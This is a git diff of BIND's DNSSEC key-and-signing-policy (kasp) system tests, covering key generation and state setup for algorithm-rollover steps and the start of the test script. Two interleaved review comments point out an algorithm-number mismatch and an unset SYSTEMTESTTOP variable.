${TactN} -I now" +zsk1times="-P ${TactN} -A ${TactN} -I now" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -z $R $TpubN1 "$ZSK2" > 
settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# The zone signatures are also OMNIPRESENT. +setup step3.algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 9 hours. +TactN="now-9h" +TretN="now-6h" +TpubN1="now-9h" +TsbmN1="now-1h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. 
+echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# The DS is swapped and can become OMNIPRESENT. +setup step4.algorithm-roll.kasp +# The time passed since the DS has been swapped is 29 hours. +TactN="now-38h" +TretN="now-35h" +TpubN1="now-38h" +TsbmN1="now-30h" +TactN1="now-29h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $U $TactN1 -D ds $TactN1 "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $R $TactN1 -P ds $TactN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. 
+echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# The DNSKEY is removed long enough to be HIDDEN. +setup step5.algorithm-roll.kasp +# The time passed since the DNSKEY has been removed is 2 hours. +TactN="now-40h" +TretN="now-37h" +TremN="now-2h" +TpubN1="now-40h" +TsbmN1="now-32h" +TactN1="now-31h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -d $H $TactN1 "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $U $TremN -z $U $TremN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. 
+echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# The RRSIGs have been removed long enough to be HIDDEN. +setup step6.algorithm-roll.kasp +# Additional time passed: 7h. +TactN="now-47h" +TretN="now-44h" +TremN="now-7h" +TpubN1="now-47h" +TsbmN1="now-39h" +TactN1="now-38h" +TdeaN="now-9h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $H $TremN -r $U $TdeaN -d $H $TactN1 "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $H $TremN -z $U $TdeaN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. 
+echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at csk-algorithm-roll.kasp represent the various steps of a CSK +# algorithm rollover. +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.csk-algorithm-roll.kasp +echo "$zone" >> zones +TactN="now" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -z $O $TactN -d $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone 5 "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# After the publication interval has passed the DNSKEY is OMNIPRESENT. +setup step2.csk-algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 3 hours. 
+TactN="now-3h" +TpubN1="now-3h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I now" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $O $TactN -d $O $TactN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -z $R $TpubN1 -d $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# The zone signatures are also OMNIPRESENT. +setup step3.csk-algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 9 hours. +TactN="now-9h" +TretN="now-6h" +TpubN1="now-9h" +TactN1="now-6h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $O $TactN -d $O $TactN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $R $TpubN1 -d $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. 
+echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# The DS is swapped and can become OMNIPRESENT. +setup step4.csk-algorithm-roll.kasp +# The time passed since the DS has been swapped is 29 hours. +TactN="now-38h" +TretN="now-35h" +TpubN1="now-38h" +TactN1="now-35h" +TsubN1="now-29h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $O $TactN -d $U $TactN1 -D ds $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $O $TsubN1 -d $R $TsubN1 -P ds $TsubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# The DNSKEY is removed long enough to be HIDDEN. +setup step5.csk-algorithm-roll.kasp +# The time passed since the DNSKEY has been removed is 2 hours. 
+TactN="now-40h" +TretN="now-37h" +TremN="now-2h" +TpubN1="now-40h" +TactN1="now-37h" +TsubN1="now-31h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -z $U $TremN -d $H $TremN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $O $TsubN1 -d $O $TremN "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# The RRSIGs have been removed long enough to be HIDDEN. +setup step6.csk-algorithm-roll.kasp +# Additional time passed: 7h. +TactN="now-47h" +TretN="now-44h" +TdeaN="now-9h" +TremN="now-7h" +TpubN1="now-47h" +TactN1="now-44h" +TsubN1="now-38h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $H $TremN -r $U $TdeaN -z $U $TdeaN -d $H $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $O $TsubN1 -d $O $TactN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. 
+echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# Reload testing +# +echo "example" >> zones +cp example.db.in example.db + +setup "dynamic2inline.kasp" +cp template.db.in $zonefile diff --git a/bin/tests/system/kasp/ns6/template.db.in b/bin/tests/system/kasp/ns6/template.db.in new file mode 100644 index 0000000..f1d8b94 --- /dev/null +++ b/bin/tests/system/kasp/ns6/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns6 +ns6 A 10.53.0.6 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/kasp/prereq.sh b/bin/tests/system/kasp/prereq.sh new file mode 100644 index 0000000..9c5d879 --- /dev/null +++ b/bin/tests/system/kasp/prereq.sh 
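Review bot: Every CSK rollover step passes algorithm number 5 to `private_type_record` for the old key (`private_type_record $zone 5 "$CSK1"`, and `"$CSK"` in step 1), but that key is generated from `policies/csk1.conf`, whose `csk-algoroll` policy sets `algorithm rsasha256`. DNSSEC algorithm 5 is RSASHA1 and 8 is RSASHA256, and the KSK/ZSK rollover steps earlier in this script pair `-a RSASHA256` with `8`. `private_type_record` is defined outside this hunk, so the effect is inferred, but the private-type record would name an algorithm the key does not use. I would write `private_type_record $zone 8 "$CSK1"` in steps 1 to 6 of csk-algorithm-roll.kasp.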
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if ! test -n "$PYTHON"; then
+ echo_i "This test requires Python."
+ exit 1
+fi
+exit 0
diff --git a/bin/tests/system/kasp/setup.sh b/bin/tests/system/kasp/setup.sh
new file mode 100644
index 0000000..d3f4329
--- /dev/null
+++ b/bin/tests/system/kasp/setup.sh
@@ -0,0 +1,80 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+$SHELL clean.sh
+
+mkdir keys
+
+copy_setports ns2/named.conf.in ns2/named.conf
+if ! $SHELL ../testcrypto.sh -q RSASHA1
+then
+ copy_setports ns3/named-fips.conf.in ns3/named.conf
+else
+ copy_setports ns3/named-fips.conf.in ns3/named-fips.conf
+ copy_setports ns3/named.conf.in ns3/named.conf
+fi
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+
+if $SHELL ../testcrypto.sh ed25519; then
+ echo "yes" > ed25519-supported.file
+fi
+
+if $SHELL ../testcrypto.sh ed448; then
+ echo "yes" > ed448-supported.file
+fi
+
+copy_setports ns3/policies/autosign.conf.in ns3/policies/autosign.conf
+copy_setports ns3/policies/kasp-fips.conf.in ns3/policies/kasp-fips.conf
+copy_setports ns3/policies/kasp.conf.in ns3/policies/kasp.conf
+if ! $SHELL ../testcrypto.sh -q RSASHA1
+then
+ cp ns3/policies/kasp-fips.conf ns3/policies/kasp.conf
+fi
+
+copy_setports ns6/policies/csk1.conf.in ns6/policies/csk1.conf
+copy_setports ns6/policies/csk2.conf.in ns6/policies/csk2.conf
+copy_setports ns6/policies/kasp-fips.conf.in ns6/policies/kasp-fips.conf
+copy_setports ns6/policies/kasp.conf.in ns6/policies/kasp.conf
+if ! $SHELL ../testcrypto.sh -q RSASHA1
+then
+ cp ns6/policies/kasp-fips.conf ns6/policies/kasp.conf
+fi
+
+# Setup zones
+(
+ cd ns2
+ $SHELL setup.sh
+)
+(
+ cd ns3
+ $SHELL setup.sh
+)
+(
+ cd ns4
+ $SHELL setup.sh
+)
+(
+ cd ns5
+ $SHELL setup.sh
+)
+(
+ cd ns6
+ $SHELL setup.sh
+)
diff --git a/bin/tests/system/kasp/tests.sh b/bin/tests/system/kasp/tests.sh
new file mode 100644
index 0000000..4d3bda7
--- /dev/null
+++ b/bin/tests/system/kasp/tests.sh
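Review bot: kasp/setup.sh sources `. "$SYSTEMTESTTOP/conf.sh"` without assigning SYSTEMTESTTOP, whereas prereq.sh and tests.sh in this commit set `SYSTEMTESTTOP=..` first. If the variable is unset or empty when the script is run by hand, the path collapses to `/conf.sh` and the shell tries to source a file from the filesystem root. Presumably the test runner exports it, but the script should not rely on that: either add `SYSTEMTESTTOP=..` before the source line or write `. "${SYSTEMTESTTOP:?}/conf.sh"` so an unset value aborts. Separately, the three `if ! $SHELL ../testcrypto.sh -q RSASHA1` probes sit in an `if` condition, where `set -e` does not apply, so a failure of the probe itself (not only missing RSASHA1 support) would silently select the FIPS configuration. Running the probe once into a variable and reusing it would keep the ns3 and ns6 choices consistent.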
@@ -0,0 +1,4882 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +# shellcheck source=kasp.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" +. "$SYSTEMTESTTOP/kasp.sh" + +start_time="$(TZ=UTC date +%s)" +status=0 +n=0 + +############################################################################### +# Utilities # +############################################################################### + +# Call dig with default options. +dig_with_opts() { + + if [ -n "$TSIG" ]; then + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" -y "$TSIG" "$@" + else + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" + fi +} + +# RNDC. +rndccmd() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "$CONTROLPORT" -s "$@" +} + +# Log error and increment failure rate. +log_error() { + echo_i "error: $1" + ret=$((ret+1)) +} + +# Default next key event threshold. May be extended by wait periods. 
+next_key_event_threshold=100 + +############################################################################### +# Tests # +############################################################################### + +# +# dnssec-keygen +# +set_zone "kasp" +set_policy "kasp" "4" "200" +set_server "keys" "10.53.0.1" + +n=$((n+1)) +echo_i "check that 'dnssec-keygen -k' (configured policy) creates valid files ($n)" +ret=0 +$KEYGEN -K keys -k "$POLICY" -l kasp.conf "$ZONE" > "keygen.out.$POLICY.test$n" 2>/dev/null || ret=1 +lines=$(wc -l < "keygen.out.$POLICY.test$n") +test "$lines" -eq $NUM_KEYS || log_error "wrong number of keys created for policy kasp: $lines" +# Temporarily don't log errors because we are searching multiple files. +disable_logerror + +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "31536000" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keyrole "KEY2" "ksk" +set_keylifetime "KEY2" "31536000" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "no" + +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "2592000" +set_keyalgorithm "KEY3" "8" "RSASHA256" "2048" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "yes" + +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "16070400" +set_keyalgorithm "KEY4" "8" "RSASHA256" "3072" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "yes" + +lines=$(get_keyids "$DIR" "$ZONE" | wc -l) +test "$lines" -eq $NUM_KEYS || log_error "bad number of key ids" + +ids=$(get_keyids "$DIR" "$ZONE") +for id in $ids; do + # There are four key files with the same algorithm. + # Check them until a match is found. 
+ ret=0 && check_key "KEY1" "$id" + test "$ret" -eq 0 && continue + + ret=0 && check_key "KEY2" "$id" + test "$ret" -eq 0 && continue + + ret=0 && check_key "KEY3" "$id" + test "$ret" -eq 0 && continue + + ret=0 && check_key "KEY4" "$id" + + # If ret is still non-zero, non of the files matched. + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done +# Turn error logs on again. +enable_logerror + +n=$((n+1)) +echo_i "check that 'dnssec-keygen -k' (default policy) creates valid files ($n)" +ret=0 +set_zone "kasp" +set_policy "default" "1" "3600" +set_server "." "10.53.0.1" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +$KEYGEN -G -k "$POLICY" "$ZONE" > "keygen.out.$POLICY.test$n" 2>/dev/null || ret=1 +lines=$(wc -l < "keygen.out.$POLICY.test$n") +test "$lines" -eq $NUM_KEYS || log_error "wrong number of keys created for policy default: $lines" +ids=$(get_keyids "$DIR" "$ZONE") +for id in $ids; do + check_key "KEY1" "$id" + test "$ret" -eq 0 && key_save KEY1 + check_keytimes +done +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# dnssec-settime +# + +# These test builds upon the latest created key with dnssec-keygen and uses the +# environment variables BASE_FILE, KEY_FILE, PRIVATE_FILE and STATE_FILE. 
+CMP_FILE="${BASE_FILE}.cmp" +n=$((n+1)) +echo_i "check that 'dnssec-settime' by default does not edit key state file ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +$SETTIME -P +3600 "$BASE_FILE" > /dev/null || log_error "settime failed" +grep "; Publish: " "$KEY_FILE" > /dev/null || log_error "mismatch published in $KEY_FILE" +grep "Publish: " "$PRIVATE_FILE" > /dev/null || log_error "mismatch published in $PRIVATE_FILE" +$DIFF "$CMP_FILE" "$STATE_FILE" || log_error "unexpected file change in $STATE_FILE" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that 'dnssec-settime -s' also sets publish time metadata and states in key state file ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +now=$(date +%Y%m%d%H%M%S) +$SETTIME -s -P "$now" -g "omnipresent" -k "rumoured" "$now" -z "omnipresent" "$now" -r "rumoured" "$now" -d "hidden" "$now" "$BASE_FILE" > /dev/null || log_error "settime failed" +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" 